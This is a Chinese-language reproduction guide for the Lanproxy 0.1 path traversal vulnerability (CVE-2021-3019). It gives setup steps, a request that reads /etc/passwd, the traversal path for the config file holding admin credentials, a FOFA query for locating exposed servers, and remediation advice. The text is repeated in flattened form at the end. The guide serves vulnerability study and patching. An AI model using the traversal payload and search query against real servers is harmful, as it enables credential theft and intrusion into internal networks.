Lanproxy路径遍历漏洞漏洞复现
字数 1461 2025-08-15 21:33:19

Lanproxy路径遍历漏洞(CVE-2021-3019)分析与复现指南

1. Lanproxy简介

Lanproxy是一个内网穿透工具,主要功能包括:

  • 将局域网个人电脑、服务器代理到公网
  • 支持TCP流量转发
  • 可支持任何TCP上层协议
  • 典型应用场景:
    • 访问内网网站
    • 本地支付接口调试
    • SSH访问
    • 远程桌面

1.1 同类产品对比

  • 花生壳
  • TeamView
  • GoToMyCloud

Lanproxy的优势:

  • 无需依赖第三方公网服务器
  • 无服务限制
  • 数据不流经第三方,安全性更高

2. 漏洞概述

漏洞编号:CVE-2021-3019
漏洞类型:路径遍历漏洞
影响版本:Lanproxy 0.1
漏洞危害

  • 可读取服务器上的任意文件
  • 可获取lanproxy配置文件
  • 通过配置文件可获取管理后台凭据
  • 登录后台后可操纵内网主机

3. 环境搭建

3.1 服务端配置

下载方式

  • 项目地址:https://github.com/ffay/lanproxy
  • 直接下载发布包:https://file.nioee.com/d/2e81550ebdbd416c933f/

配置步骤

  1. 解压proxy-server-0.1.zip到公网VPS
  2. 编辑配置文件proxy-server-0.1/conf/config.properties
server.bind=0.0.0.0
server.port=4900
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=test.jks
server.ssl.keyStorePassword=123456
server.ssl.keyManagerPassword=123456
server.ssl.needsClientAuth=false
config.server.bind=0.0.0.0
config.server.port=8090
config.admin.username=admin
config.admin.password=657260
  1. 启动服务:
cd proxy-server-0.1/bin
chmod +x startup.sh
nohup ./startup.sh &

Windows系统:直接运行startup.bat

3.2 客户端配置

下载地址:https://seafile.cdjxt.net/d/2e81550ebdbd416c933f

配置步骤

  1. 解压proxy-java-client-0.1.zip到内网主机
  2. 编辑配置文件proxy-java-client-0.1/conf/config.properties
client.key=8dfeb0db68c2400a8c0d30395abb65e2
ssl.enable=true
ssl.jksPath=test.jks
ssl.keyStorePassword=123456
server.host=47.xxx.xxx.72
server.port=4993
  1. 启动客户端:
cd proxy-java-client-0.1/bin
chmod +x startup.sh
nohup ./startup.sh &

Windows系统:直接双击startup.bat

3.3 端口映射配置

  1. 访问VPS的8090端口(如:http://47.xxx.xxx.72:8090)
  2. 使用配置的用户名密码登录(默认admin/657260)
  3. 在"添加客户端"选项中:
    • 填写客户端名称
    • 生成客户端秘钥
  4. 在"配置管理"中设置端口映射:
    • 将内网主机端口(如22)映射到公网端口(如2222)

使用示例

ssh root@47.xxx.xxx.72 -p 2222

4. 漏洞复现

4.1 漏洞验证

构造恶意请求读取/etc/passwd

GET etc/passwd HTTP/1.1
Host: 47.xxx.xxx.72:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close

4.2 读取配置文件

路径遍历读取配置文件

/../conf/config.properties

获取到的配置文件包含:

  • 管理后台用户名
  • 管理后台密码

4.3 利用获取的凭据登录后台

使用读取到的用户名密码登录管理面板,获得内网访问权限。

5. 影响范围检测

FOFA搜索语法

header="Server: LPS-0.1"

截至文档编写时,公网暴露的实例:2029台

6. 修复建议

  1. 临时解决方案

    • 禁止将lanproxy管理面板对外部开放
    • 配置防火墙规则限制访问
  2. 长期解决方案

    • 升级到最新版本
    • 补丁获取链接:https://github.com/ffay/lanproxy/commits/master
  3. 安全配置建议

    • 修改默认管理凭据
    • 启用HTTPS
    • 限制可访问IP

7. 参考资源

  1. Lanproxy配置指南:http://www.kekefund.com/2018/06/24/lanproxy/
  2. CNNVD漏洞公告:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202101-275
  3. 漏洞分析文章:微信文章(标题:Lanproxy路径遍历漏洞分析)
Lanproxy路径遍历漏洞(CVE-2021-3019)分析与复现指南 1. Lanproxy简介 Lanproxy是一个内网穿透工具,主要功能包括: 将局域网个人电脑、服务器代理到公网 支持TCP流量转发 可支持任何TCP上层协议 典型应用场景: 访问内网网站 本地支付接口调试 SSH访问 远程桌面 1.1 同类产品对比 花生壳 TeamView GoToMyCloud Lanproxy的优势: 无需依赖第三方公网服务器 无服务限制 数据不流经第三方,安全性更高 2. 漏洞概述 漏洞编号 :CVE-2021-3019 漏洞类型 :路径遍历漏洞 影响版本 :Lanproxy 0.1 漏洞危害 : 可读取服务器上的任意文件 可获取lanproxy配置文件 通过配置文件可获取管理后台凭据 登录后台后可操纵内网主机 3. 环境搭建 3.1 服务端配置 下载方式 : 项目地址:https://github.com/ffay/lanproxy 直接下载发布包:https://file.nioee.com/d/2e81550ebdbd416c933f/ 配置步骤 : 解压proxy-server-0.1.zip到公网VPS 编辑配置文件 proxy-server-0.1/conf/config.properties : 启动服务: Windows系统 :直接运行startup.bat 3.2 客户端配置 下载地址 :https://seafile.cdjxt.net/d/2e81550ebdbd416c933f 配置步骤 : 解压proxy-java-client-0.1.zip到内网主机 编辑配置文件 proxy-java-client-0.1/conf/config.properties : 启动客户端: Windows系统 :直接双击startup.bat 3.3 端口映射配置 访问VPS的8090端口(如:http://47.xxx.xxx.72:8090) 使用配置的用户名密码登录(默认admin/657260) 在"添加客户端"选项中: 填写客户端名称 生成客户端秘钥 在"配置管理"中设置端口映射: 将内网主机端口(如22)映射到公网端口(如2222) 使用示例 : 4. 漏洞复现 4.1 漏洞验证 构造恶意请求读取/etc/passwd : 4.2 读取配置文件 路径遍历读取配置文件 : 获取到的配置文件包含: 管理后台用户名 管理后台密码 4.3 利用获取的凭据登录后台 使用读取到的用户名密码登录管理面板,获得内网访问权限。 5. 影响范围检测 FOFA搜索语法 : 截至文档编写时,公网暴露的实例:2029台 6. 修复建议 临时解决方案 : 禁止将lanproxy管理面板对外部开放 配置防火墙规则限制访问 长期解决方案 : 升级到最新版本 补丁获取链接:https://github.com/ffay/lanproxy/commits/master 安全配置建议 : 修改默认管理凭据 启用HTTPS 限制可访问IP 7. 参考资源 Lanproxy配置指南:http://www.kekefund.com/2018/06/24/lanproxy/ CNNVD漏洞公告:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202101-275 漏洞分析文章:微信文章(标题:Lanproxy路径遍历漏洞分析)